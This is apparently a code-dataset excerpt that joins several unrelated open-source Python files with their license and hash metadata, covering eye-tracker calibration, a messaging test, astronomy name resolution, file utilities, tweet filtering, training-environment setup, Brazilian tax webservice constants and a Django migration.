{'eye_camera_to_world_matrix':eye_camera_to_world_matrix ,
'camera_intrinsics': camera_intrinsics ,
'cal_points_3d': points_in_world,
'cal_ref_points_3d': points_a,
'cal_gaze_points_3d': points_b,
'gaze_distance':500})
else:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
elif mode == '2d':
if matched_binocular_data:
method = 'binocular polynomial regression'
cal_pt_cloud_binocular = calibrate.preprocess_2d_data_binocular(matched_binocular_data)
cal_pt_cloud0 = calibrate.preprocess_2d_data_monocular(matched_pupil0_data)
cal_pt_cloud1 = calibrate.preprocess_2d_data_monocular(matched_pupil1_data)
map_fn,inliers,params = calibrate.calibrate_2d_polynomial(cal_pt_cloud_binocular,g_pool.capture.frame_size,binocular=True)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
map_fn,inliers,params_eye0 = calibrate.calibrate_2d_polynomial(cal_pt_cloud0,g_pool.capture.frame_size,binocular=False)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
map_fn,inliers,params_eye1 = calibrate.calibrate_2d_polynomial(cal_pt_cloud1,g_pool.capture.frame_size,binocular=False)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
g_pool.plugins.add(Binocular_Gaze_Mapper,args={'params':params, 'params_eye0':params_eye0, 'params_eye1':params_eye1})
elif matched_monocular_data:
method = 'monocular polynomial regression'
cal_pt_cloud = calibrate.preprocess_2d_data_monocular(matched_monocular_data)
map_fn,inliers,params = calibrate.calibrate_2d_polynomial(cal_pt_cloud,g_pool.capture.frame_size,binocular=False)
if not inliers.any():
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
g_pool.plugins.add(Monocular_Gaze_Mapper,args={'params':params})
else:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
ts = g_pool.get_timestamp()
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.successful','method':method,'timestamp': ts, 'record':True})
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.calibration_data','timestamp': ts, 'pupil_list':pupil_list,'ref_list':ref_list,'calibration_method':method,'record':True})
#this is only used by show calibration. TODO: rewrite show calibraiton.
user_calibration_data = {'timestamp': ts,'pupil_list':pupil_list,'ref_list':ref_list,'calibration_method':method}
save_object(user_calibration_data,os.path.join(g_pool.user_dir, "user_calibration_data"))
|
lgpl-3.0
| 1,249,891,660,788,555,000
| 50.875371
| 194
| 0.605709
| false
| 3.668065
| false
| false
| false
|
nfqsolutions/pylm
|
tests/test_services/test_subscribed_client.py
|
1
|
2736
|
import concurrent.futures
import time
from concurrent.futures import ThreadPoolExecutor
import zmq
from pylm.clients import Client
from pylm.parts.core import zmq_context
from pylm.parts.messages_pb2 import PalmMessage
def fake_server(messages=1):
db_socket = zmq_context.socket(zmq.REP)
db_socket.bind('inproc://db')
pull_socket = zmq_context.socket(zmq.PULL)
pull_socket.bind('inproc://pull')
pub_socket = zmq_context.socket(zmq.PUB)
pub_socket.bind('inproc://pub')
# PUB-SUB takes a while
time.sleep(1.0)
for i in range(messages):
message_data = pull_socket.recv()
print(i)
message = PalmMessage()
message.ParseFromString(message_data)
topic = message.client
pub_socket.send_multipart([topic.encode('utf-8'), message_data])
def test_subscribed_client_single():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
push_address='inproc://pull',
sub_address='inproc://pub',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=2),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 2
def test_subscribed_client_multiple():
got = []
client = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
client1 = Client(
server_name='someserver',
db_address='inproc://db',
sub_address='inproc://pub',
push_address='inproc://pull',
this_config=True)
with ThreadPoolExecutor(max_workers=2) as executor:
results = [
executor.submit(fake_server, messages=4),
executor.submit(client.job, 'f', [b'1', b'2'], messages=2),
executor.submit(client1.job, 'f', [b'a', b'b'], messages=2)
]
for future in concurrent.futures.as_completed(results):
try:
result = future.result()
if result:
for r in result:
got.append(r)
except Exception as exc:
print(exc)
assert len(got) == 4
if __name__ == '__main__':
test_subscribed_client_single()
test_subscribed_client_multiple()
|
agpl-3.0
| -7,718,448,006,989,908,000
| 25.823529
| 72
| 0.56981
| false
| 3.858956
| false
| false
| false
|
Stargrazer82301/CAAPR
|
CAAPR/CAAPR_AstroMagic/PTS/pts/magic/tools/sesame.py
|
1
|
3792
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.tools.sesame Contains the Sesame class.
# -----------------------------------------------------------------
"""
Created on Mar 13, 2011
Sesame class to access Sesame name resolver service
Based on 2005-06-11 by Shui Hung Kwok
See http://cdsweb.u-strasbg.fr/doc/sesame.htx for description of Sesame
@author: shkwok
"""
from urllib2 import urlopen
#from xparser.XParser import XParser
#from .. import XParser
# -----------------------------------------------------------------
class Sesame (object):
"""
This class ...
"""
CatalogOpt = "SNV" # S simbad, N ned, V vizier, A All
OutputOpt = "oxp" # xp for xml as text/plain rather then text/xml (-ox)
SesameURL = "http://cdsweb.u-strasbg.fr/cgi-bin/nph-sesame"
def __init__(self, urn=SesameURL, opt=CatalogOpt, opt1=OutputOpt):
"""
Initializes Sesame URL and options
Default options are SNV for CatalogOpt
and -oxp for OutputOpt.
SNV = Simbad + NED + Vizier and A for All
The order indicates the order to search.
"All" means search all services, otherwise stops when
first entry found.
Output options start with -o
followed by
x : xml output
p : plain text
I : include all identifiers
"""
self.catOpt = opt
self.outOpt = opt1
self.urn = urn
# Sesame
def getCoord(self, node):
"""
Helper method to extract ra and dec from node
"""
res = node.getResource("/Sesame/Target");
resolvers = res.getChildren ("Resolver")
for r in resolvers:
try:
ra = float (r.getResourceContent("/Resolver/jradeg").strip())
dec = float (r.getResourceContent("/Resolver/jdedeg").strip())
return ra, dec
except Exception:
raise Exception, "invalid coordinates"
else:
raise Exception, "no ra/dec values found"
# getCoord
def getAliases(self):
"""
Extracts aliases for the given target.
Returns a list of names.
"""
res = []
for resolver in self.xml.root.Sesame.Resolver:
try:
for a in resolver.alias:
res.append (a.content)
except:
pass
return res
def buildQuery(self, name, all=True):
"""
Builds query URL for use with HTTP GET
If all is true, then all known identifiers shall be returned.
"""
opt = self.catOpt
opt1 = '-' + self.outOpt
if all:
opt += 'A'
opt1 += 'I' # all identifiers
queryURL = "%s/%s/%s?%s" % (self.urn, opt1, opt, name)
return queryURL
def resolveRaw(self, name, all=True):
"""
Performs a raw query.
Returns what the server returns.
"""
query = self.buildQuery (name, all)
print "query=", query
hcon = urlopen (query)
res = hcon.read ()
hcon.close ()
return res
def resolve(self, name, all=True):
"""
Performs a query.
Returns ra and dec
"""
query = self.buildQuery(name, all)
xp = XParser()
xn = xp.parseFromFile(query)
return self.getCoord(xn)
|
mit
| -434,090,002,494,834,500
| 27.727273
| 78
| 0.498813
| false
| 4.193584
| false
| false
| false
|
containers-ftw/cftw
|
cftw/utils.py
|
1
|
8502
|
'''
utils.py: part of cftw package
Copyright (c) 2017 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import fnmatch
import os
import json
import re
import shutil
import simplejson
from cftw.logger import bot
import sys
import subprocess
import tempfile
import tarfile
import zipfile
######################################################################################
# Local commands and requests
######################################################################################
def get_installdir():
'''get_installdir returns the installation directory of the application
'''
return os.path.abspath(os.path.dirname(__file__))
def run_command(cmd,error_message=None,sudopw=None,suppress=False):
'''run_command uses subprocess to send a command to the terminal.
:param cmd: the command to send, should be a list for subprocess
:param error_message: the error message to give to user if fails,
if none specified, will alert that command failed.
:param execute: if True, will add `` around command (default is False)
:param sudopw: if specified (not None) command will be run asking for sudo
'''
if sudopw == None:
sudopw = os.environ.get('pancakes',None)
if sudopw != None:
cmd = ' '.join(["echo", sudopw,"|","sudo","-S"] + cmd)
if suppress == False:
output = os.popen(cmd).read().strip('\n')
else:
output = cmd
os.system(cmd)
else:
try:
process = subprocess.Popen(cmd,stdout=subprocess.PIPE)
output, err = process.communicate()
except OSError as error:
bot.error(err)
return None
return output
############################################################################
## FILE OPERATIONS #########################################################
############################################################################
def write_file(filename,content,mode="w"):
'''write_file will open a file, "filename" and write content, "content"
and properly close the file
'''
with open(filename,mode) as filey:
filey.writelines(content)
return filename
def write_json(json_obj,filename,mode="w",print_pretty=True):
'''write_json will (optionally,pretty print) a json object to file
:param json_obj: the dict to print to json
:param filename: the output file to write to
:param pretty_print: if True, will use nicer formatting
'''
with open(filename,mode) as filey:
if print_pretty == True:
filey.writelines(simplejson.dumps(json_obj, indent=4, separators=(',', ': ')))
else:
filey.writelines(simplejson.dumps(json_obj))
return filename
def read_file(filename,mode="r"):
'''write_file will open a file, "filename" and write content, "content"
and properly close the file
'''
with open(filename,mode) as filey:
content = filey.readlines()
return content
def read_json(filename,mode="r"):
'''read_json will open a file, "filename" and read the string as json
'''
with open(filename,mode) as filey:
content = json.loads(filey.read())
return content
def recursive_find(base,pattern=None):
'''recursive find dicoms will search for dicom files in all directory levels
below a base. It uses get_dcm_files to find the files in the bases.
'''
if pattern is None:
pattern = "*"
files = []
for root, dirnames, filenames in os.walk(base):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
############################################################################
## FOLDER OPERATIONS #########################################################
############################################################################
def mkdir_p(path):
'''mkdir_p attempts to get the same functionality as mkdir -p
:param path: the path to create.
'''
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
bot.error("Error creating path %s, exiting." %path)
sys.exit(1)
def tree(base):
'''print a simple directory tree, primarily for showing
content of templates'''
for root, dirs, files in os.walk(base):
level = root.replace(base, '').count(os.sep)
indent = ' ' * 4 * (level)
print('{}{}/'.format(indent, os.path.basename(root)))
subindent = ' ' * 4 * (level + 1)
for f in files:
print('{}{}'.format(subindent, f))
############################################################################
## COMPRESSED FILES ########################################################
############################################################################
def detect_compressed(folder,compressed_types=None):
'''detect compressed will return a list of files in
some folder that are compressed, by default this means
.zip or .tar.gz, but the called can specify a custom list
:param folder: the folder base to use.
:param compressed_types: a list of types to include, should
be extensions in format like *.tar.gz, *.zip, etc.
'''
compressed = []
if compressed_types == None:
compressed_types = ["*.tar.gz",'*zip']
bot.debug("Searching for %s" %", ".join(compressed_types))
for filey in os.listdir(folder):
for compressed_type in compressed_types:
if fnmatch.fnmatch(filey, compressed_type):
compressed.append("%s/%s" %(folder,filey))
bot.debug("Found %s compressed files in %s" %len(compressed),folder)
return compressed
def unzip_dir(zip_file,dest_dir=None):
'''unzip_dir will extract a zipfile to a directory. If
an extraction destination is not defined, a temporary
directory will be created and used.
:param zip_file: the .zip file to unzip
:param dest_dir: the destination directory
'''
if dest_dir == None:
dest_dir = tempfile.mkdtemp()
with zipfile.ZipFile(zip_file,"r") as zf:
zf.extractall(dest_dir)
return dest_dir
def zip_dir(zip_dir, zip_name, output_folder=None):
'''zip_dir will zip up and entire zip directory
:param folder_path: the folder to zip up
:param zip_name: the name of the zip to return
:output_folder:
'''
tmpdir = tempfile.mkdtemp()
output_zip = "%s/%s" %(tmpdir,zip_name)
zf = zipfile.ZipFile(output_zip, "w", zipfile.ZIP_DEFLATED, allowZip64=True)
for root, dirs, files in os.walk(zip_dir):
for file in files:
zf.write(os.path.join(root, file))
zf.close()
if output_folder != None:
shutil.copyfile(output_zip,"%s/%s"%(output_folder,zip_name))
shutil.rmtree(tmpdir)
output_zip = "%s/%s"%(output_folder,zip_name)
return output_zip
def untar_dir(tar_file,dest_dir=None):
'''untar_dir will extract a tarfile to a directory. If
an extraction destination is not defined, a temporary
directory will be created and used.
:param tar_file: the .tar.gz file to untar/decompress
:param dest_dir: the destination directory
'''
if dest_dir == None:
dest_dir = tempfile.mkdtemp()
contents = []
if tarfile.is_tarfile(tar_file):
with tarfile.open(tar_file) as tf:
tf.extractall(dest_dir)
return dest_dir
|
mit
| 8,000,063,582,081,847,000
| 32.472441
| 90
| 0.597389
| false
| 4.217262
| false
| false
| false
|
pepincho/playground
|
python/Learn-Python-The-Hard-Way/exercises11to20.py
|
1
|
2190
|
# exercise 11
name = input("What's your name? ") # take the name from the keyboard
print ("Your name is {}".format(name))
# exercise 15
file_again = input("Type the filename again: > ") # read the file's name from the keyboard
txt_again = open(file_again) # open the file
print (txt_again.read()) # print the file's content
# exercise 16
print ("Opening the file...")
target_name = input("Type the filename: > ")
target_txt = open(target_name, "r+")
print ("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print ("I'm going to write these to the file.")
target_txt.write(line1)
target_txt.write("\n")
target_txt.write(line2)
target_txt.write("\n")
target_txt.write(line3)
target_txt.write("\n")
print ("And finally, we close it.")
target_txt.close()
# exerckse 17, read from a file and write in another file
from os.path import exists
from_file = input("From file: > ")
to_file = input("To file: > ")
in_file = open(from_file)
indata = in_file.read()
print ("The input file is {} bytes long.".format(len(indata)))
print ("Does the output file exist? {}".format(exists(to_file)))
out_file = open(to_file, 'w')
out_file.write(indata)
print ("Alright, all done.")
out_file.close()
in_file.close()
# exercise 18
def print_two(*args):
arg1, arg2 = args
print ("arg1: %r, arg2: %r" % (arg1, arg2))
def print_two_again(arg1, arg2):
print ("arg1: %r, arg2: %r" % (arg1, arg2))
def print_none():
print ("I got nothin'.")
print_two("Zed","Shaw")
print_two_again("Zed","Shaw")
print_none()
# exercise 20
def print_all(f):
print (f.read())
def rewind(f):
f.seek(0)
def print_a_line(line_count, f):
print (line_count, f.readline())
file_name = input("File name: > ")
current_file = open(file_name)
print ("First let's print the whole file:\n")
print_all(current_file)
print ("Now let's rewind, kind of like a tape.")
print (rewind(current_file))
print ("Let's print three lines:")
current_line = 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
|
mit
| -1,002,428,991,431,571,700
| 21.121212
| 90
| 0.67032
| false
| 2.807692
| false
| false
| false
|
bfontaine/Teebr
|
teebr/features.py
|
1
|
6724
|
# -*- coding: UTF-8 -*-
from __future__ import absolute_import, unicode_literals
import re
from json import dumps
from collections import defaultdict
from .log import mkLogger
from .text.utils import contains_emoji, extract_named_entities
from .text.utils import most_common_words
from .text.spam import is_spam
logger = mkLogger("features")
LANGUAGES = ('en',) # 'fr')
SOURCE_TYPES = {
"source_mobile": [
"Echofon",
"Mobile Web (M2)",
"Mobile Web (M5)",
"Mobile Web",
"Samsung Mobile",
"Twitter for Android",
"Twitter for BlackBerry®",
"Twitter for Windows Phone",
"Twitter for iPhone",
"Twitterrific",
"iOS",
"uberSocial for Android",
],
"source_tablet": [
"Twitter for Android Tablets",
"Twitter for iPad",
],
"source_desktop": [
"TweetDeck",
"Twitter Web Client",
"Twitter for Mac",
"OS X",
],
# automated publication tools + bot-like tweets
"source_autopub": [
"Buffer",
"Hootsuite",
"IFTTT",
"JustUnfollow",
"RoundTeam",
"TweetAdder v4",
"fllwrs",
"twittbot.net",
],
"source_social": [
"Ask.fm",
"Facebook",
"Foursquare",
"Instagram",
"LinkedIn",
"Path",
"Pinterest",
"Reddit RSS",
"Vine - Make a Scene",
"Vine for Android",
],
"source_news": [
"Nachrichten News",
],
"source_other": [],
}
URL_TYPES = {
"url_social": [
"fb.me",
"path.com",
],
"url_social_media": [
"vine.co",
"instagram.com",
],
"url_product": [
"amzn.to",
],
"url_video": [
"youtu.be",
],
}
# TODO we might be able to remove this now that we have a spam filter
APPS_BLACKLIST = set([
# followers spam
u"Unfollowers",
u"JustUnfollow",
u"fllwrs",
u"..ignite.v.1.",
u"Adi Sumardiyasa",
u"Who Unfollowed Me",
# tweets ranking
u"001FM Top40 Tweets",
# Games
u"1Dreamboy 2 Game",
u"1Dreamboy Version 2 Game",
u"Airport City Mobile",
u"The Tribez HD on iOS",
# General news
u"233Live Tweets",
u"247newz",
# Misc news
u"ADVFN News Alert",
u"APD Traffic Alerts",
# Buzzfeed-like
u"75325love",
u"AlltheGoss",
u"AllHealthSecrets.com",
u"Amusing information",
u"volkanc",
u"awe.sm",
# nsfw
u"definebabecom",
u"Cumagination Gay",
u"Cumagination Lesbian",
u"EscortGuidexXx",
u"TweetAdder v",
# Misc Spam
u";sdklafjas",
u"Acne-Treatments-and-Tips.com",
u"AmazonRecommend",
# Others
u"Adcourier",
])
# some apps add numbers at the end, e.g. MySpam, MySpam1, MySpam2, etc
END_DIGITS = re.compile(r"\s*\d+$")
entity_keys = ("urls", "hashtags", "user_mentions", "trends", "symbols", "media")
def filter_status(st):
"""
Check if we should include a status as returned by the Streaming API in our
DB. It'll return ``False`` if it should be rejected.
"""
# keep only some languages
if st.lang not in LANGUAGES:
return False
# remove replies
if st.in_reply_to_screen_name:
return False
# remove RTs
if getattr(st, 'retweeted_status', False):
return False
# remove suspicious apps
if not st.source or not st.source_url:
return False
# remove spam apps
if END_DIGITS.sub("", st.source) in APPS_BLACKLIST:
return False
# remove manual RTs
if st.text.startswith("RT @") or st.text.startswith("MT @"):
return False
# remove manual responses
if st.text.startswith(".@"):
return False
# remove other spam tweets
if is_spam(st.text):
return False
# ok
return True
class FeaturesDict(defaultdict):
def __init__(self, st):
super(FeaturesDict, self).__init__(float)
self._st = st
def compute_features(self):
"""
Compute all features for this tweet
"""
self._set_source_type()
self._set_extra_entities()
st = self._st
self["sg_geolocalized"] = float(st.geo is not None)
self["sg_lang_%s" % st.lang] = 1.0
self["sg_contributors"] = float(st.contributors is not None)
self["sg_emojis"] = contains_emoji(st.text)
# some statuses don't have this attribute
self["sg_nsfw"] = getattr(st, "possibly_sensitive", 0.0)
entities = extract_named_entities(st.text)
self["names"] = ",".join(entities)
for entity in entities:
entity = entity.lower()
if entity in most_common_words:
self["sg_mc_word_%s" % entity] = 1.0
self["retweet_count"] = getattr(st, "retweet_count", 0.0)
self["favorite_count"] = getattr(st, "favorite_count", 0.0)
for key in entity_keys:
self["sg_%s" % key] = int(bool(self._st.entities["urls"]))
def _set_source_type(self):
"""
Feature: source type
Keys: source_mobile, source_desktop, source_autopub, source_social,
source_tablet, source_other, ... (see SOURCE_TYPES)
Values: [0, 1]
"""
text = self._st.source.strip()
for s,vs in SOURCE_TYPES.items():
if text in vs:
self["sg_%s" % s] = 1.0
return
ltext = text.lower()
for brand in ("android", "iphone", "blackberry", "windows phone"):
if ltext.endswith(" for %s" % brand):
self["sg_source_mobile"] = 1.0
return
self["sg_source_others"] = 1.0
def _set_extra_entities(self):
extra = {}
media = getattr(self._st, "entities", {}).get("media", [])
if media:
photos = []
for m in media:
# TODO check the format for videos
if m.get("type") != "photo":
continue
photos.append({
# The image URL
"media_url": m["media_url_https"],
# The URL included in the status (expanded by us)
"url": m["expanded_url"],
})
extra["photos"] = photos
self["extra_entities"] = dumps(extra)
def compute_features(status):
expand_urls(status)
f = FeaturesDict(status)
f.compute_features()
return f
def expand_urls(st):
entities = getattr(st, "entities", {})
for link in entities.get("urls", []) + entities.get("media", []):
st.text = st.text.replace(link["url"], link["expanded_url"])
|
mit
| -323,460,344,605,223,000
| 22.840426
| 81
| 0.542466
| false
| 3.519895
| false
| false
| false
|
jabez007/Training_Helpyr
|
Setup/__init__.py
|
1
|
7646
|
import re
import os
APP_PATH = os.path.join(*os.path.split(os.path.dirname(os.path.realpath(__file__)))[:-1])
import sys
if APP_PATH not in sys.path:
sys.path.append(APP_PATH)
import MyTrack
import PowerShell
import Phonebook
import Overlord
import Log
LOGGER = Log.MyLog(name=__name__)
# # # #
"""
Special setup for Care Everywhere 101 (fka CE-500)
"""
def ce500(instructor, trainees, code="CSCce500setup"):
"""
entry point for setting up CE 101 (FKA CE500)
:param instructor: <string> the cache environment for the Instructor
:param trainees: <string> the cache environments for the trainees
:param code: <string> the Overlord tag the needs to be ran in each environment to complete setup
:return: <bool> True if everything was successful
"""
gwn = None
instr = "".join([c for c in instructor if c.isdigit()])
trns = clean_caches(trainees)
if instr:
'''
if this is a fresh class setup, as in we are not just adding trainee environments to an existing class
'''
# pull out the last trainee environment and make it GWN
gwn = trns[-1:]
if gwen(gwn):
# then take that environment out of the list we'll set up later
trns = trns[:-1]
LOGGER.info("epic-trn%s set up as GWN environment" % gwn[0])
else:
# otherwise, skip the GWN setup and make this a normal environment
gwn = None
LOGGER.error("Galaxy Wide Network not set up")
setup_instructor(instr)
# Connect Interconnects to trainee environments
if not assign_interconnects("CE500", trns):
return False
# Update Training Phone Book with new environment assignments
if not update_phonebook(trns):
return False
# Restart the Training Phone Book so our changes take affect
if not PowerShell.restart_phonebook():
LOGGER.error("Error in restarting Training Phonebook Interconnect")
return False
# Run Cache setup script
if not setup_cache([instr]+trns, code):
return False
if gwn is not None:
setup_cache(gwn, code, "GWeN")
return True
def setup_instructor(instructor):
"""
runs the setup particular to the instructor environment
:param instructor: <string> the cache environment for the class instructor
:return: <bool> True is everything was successful
"""
# Connect Interconnect to instructor environment
if not PowerShell.setup('01', instructor):
LOGGER.error("Failed to connect epic-trn%s to CE500 instructor Interconnect. See powershell.err" % instructor)
return False
# Save to tracking database
if not MyTrack.assign("Instructors", "train01", "epic-trn"+instructor):
LOGGER.error("Setup between CE500 instructor Interconnect and epic-trn%s not saved to database. See my_track.err"
% instructor)
# Reset TRN Phonebook and register Instructor environment
if not Phonebook.TrnPhonebook().instructor(instructor):
LOGGER.error("Error in registering epic-trn%s as the Instructor environment in the Training Phonebook. See TRNphonebook.err"
% instructor)
return False
LOGGER.info("epic-trn%s set up as instructor environment" % instructor)
return True
def update_phonebook(trainees):
"""
updates the training Phonebook with trainee environments for this class
:param trainees: <list(string)> the cache environments for the trainees
:return: <bool> True if everything was successful
"""
for cache in trainees:
if not Phonebook.TrnPhonebook().register(cache):
LOGGER.error("Error in registering epic-trn%s with Training Phonebook. See TRNphonebook.err" % cache)
return False
LOGGER.info("Trainee environments registered in phonebook")
return True
def gwen(trainee):
"""
runs the setup particular to the Galaxy Wide Network environment
:param trainee: <string> the cache environment for GWN
:return: <bool> True if everything was successful
"""
# assign interconnect - this should be the same as the other trainee environments
assign_interconnects("CE500", trainee)
# update Phonebook
if not Phonebook.TrnPhonebook().register_gwn(trainee[0]):
return False
# setup cache for GWN with the other environments
return True
# # # #
"""
Generic Care Everywhere setup for IP and AMB Funds classes
"""
def funds(caches, code="CSCInpFunds"):
"""
:param caches: <string>
:param code: <string>
:return: <bool>
"""
trns = clean_caches(caches)
if not assign_interconnects("AMB_IP", trns):
return False
if code:
if not setup_cache(trns, code):
return False
return True
# # # #
"""
used by both Care Everywhere 101 and IP/AMB Funds
"""
def clean_caches(caches):
"""
uses regex to parse out our cache environments passed in
:param caches: <string>
:return: <list(string)>
"""
return_caches = list()
data = re.finditer("([a-zA-Z0-9\-]+)", caches)
for d in data:
cache = "".join([s for s in d.group(1) if s.isdigit()])
# make sure we have an environment and that it's not already assigned
if cache and not MyTrack.check_assigned(cache):
return_caches.append(cache)
return return_caches
def assign_interconnects(_class, trns):
assigned_interconnects = 1 # CE500 instructor always gets Interconnect 1
clss = _class
for cache in trns:
# #
if ("CE500" in _class) and (assigned_interconnects >= 40): # if training overbooks us, steal from FUNDs
clss = "AMB_IP"
interconnect = "".join([s for s in MyTrack.get("unassigned", "AMB_IP") if s.isdigit()])
else:
interconnect = "".join([s for s in MyTrack.get("unassigned", _class) if s.isdigit()])
# #
if interconnect:
if not PowerShell.setup(interconnect, cache):
LOGGER.error("Powershell failed to connect epic-trn%s to train%s" % (cache, interconnect))
return False
assigned_interconnects += 1
if not MyTrack.assign(clss, "train"+interconnect, "epic-trn"+cache):
LOGGER.error("Setup between epic-trn%s and train%s not saved to MyTrack" % (cache, interconnect))
return False
else:
LOGGER.error("No Interconnect returned from MyTrack for epic-trn%s" % cache)
return False
LOGGER.info("epic-trn%s connected to Interconnect-train%s" % (cache, interconnect))
return True
def setup_cache(trns, code, flag=""):
success = True
for trn in trns:
if not Overlord.overlord(trn, code, flag):
LOGGER.error("Error running %s. See Overlord logs" % code)
success = False
# LOGGER.info("%s successfully ran in %s" % (code, ", ".join(trns)))
return success
# # # #
if __name__ == "__main__":
import datetime
import Outlook
for days in range(2): # setup today's and tomorrow's classes
tomorrow = (datetime.datetime.now() + datetime.timedelta(days=days)).strftime("%m/%d/%Y") # MM/DD/YYYY
print("Setting up classes for %s:" % tomorrow)
classes = MyTrack.setup_schedule(tomorrow)
for new_class in classes:
if funds(new_class[0]):
print("\t%s - email to %s" % (new_class[0], new_class[1]))
Outlook.send_email(e_address=new_class[1], env=new_class[0])
else:
print("\t%s failed" % new_class[0])
|
mit
| -4,601,870,185,056,420,400
| 31.675214
| 132
| 0.639681
| false
| 3.836427
| false
| false
| false
|
aricaldeira/PySPED
|
pysped/cte/webservices_flags.py
|
1
|
2161
|
# -*- coding: utf-8 -*-
#
# PySPED - Python libraries to deal with Brazil's SPED Project
#
# Copyright (C) 2010-2012
# Copyright (C) Aristides Caldeira <aristides.caldeira at tauga.com.br>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Library General Public License as
# published by the Free Software Foundation, either version 2.1 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# PySPED - Bibliotecas Python para o
# SPED - Sistema Público de Escrituração Digital
#
# Copyright (C) 2010-2012
# Copyright (C) Aristides Caldeira <aristides.caldeira arroba tauga.com.br>
#
# Este programa é um software livre: você pode redistribuir e/ou modificar
# este programa sob os termos da licença GNU Library General Public License,
# publicada pela Free Software Foundation, em sua versão 2.1 ou, de acordo
# com sua opção, qualquer versão posterior.
#
# Este programa é distribuido na esperança de que venha a ser útil,
# porém SEM QUAISQUER GARANTIAS, nem mesmo a garantia implícita de
# COMERCIABILIDADE ou ADEQUAÇÃO A UMA FINALIDADE ESPECÍFICA. Veja a
# GNU Library General Public License para mais detalhes.
#
# Você deve ter recebido uma cópia da GNU Library General Public License
# juntamente com este programa. Caso esse não seja o caso, acesse:
# <http://www.gnu.org/licenses/>
#
from __future__ import division, print_function, unicode_literals
from ..nfe.webservices_flags import UF_CODIGO, CODIGO_UF
WS_CTE_AUTORIZACAO = 0
WS_CTE_CONSULTA_AUTORIZACAO = 1
WS_CTE_INUTILIZACAO = 1
WS_CTE_CONSULTA = 3
WS_CTE_SITUACAO = 4
WS_CTE_RECEPCAO_EVENTO = 2
WS_CTE_RECEPCAO_OS = 5
WS_CTE_DISTRIBUICAO = 6
CTE_AMBIENTE_PRODUCAO = 1
CTE_AMBIENTE_HOMOLOGACAO = 2
|
lgpl-2.1
| -2,877,343,729,118,594,600
| 36.54386
| 76
| 0.757944
| false
| 2.801047
| false
| false
| false
|
sunoru/pokemon_only
|
stall/migrations/0001_initial.py
|
1
|
6359
|
# Generated by Django 2.2.2 on 2019-06-04 21:16
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('validated', models.BooleanField(default=False)),
('name', models.CharField(default='未命名', max_length=50)),
('item_type', models.CharField(default='', help_text='种类', max_length=20)),
('content', models.CharField(default='', help_text='内容', max_length=100)),
('price', models.FloatField(default=0, help_text='价格')),
('url', models.URLField(default='', help_text='链接')),
('authors', models.TextField(default='', help_text='作者名单')),
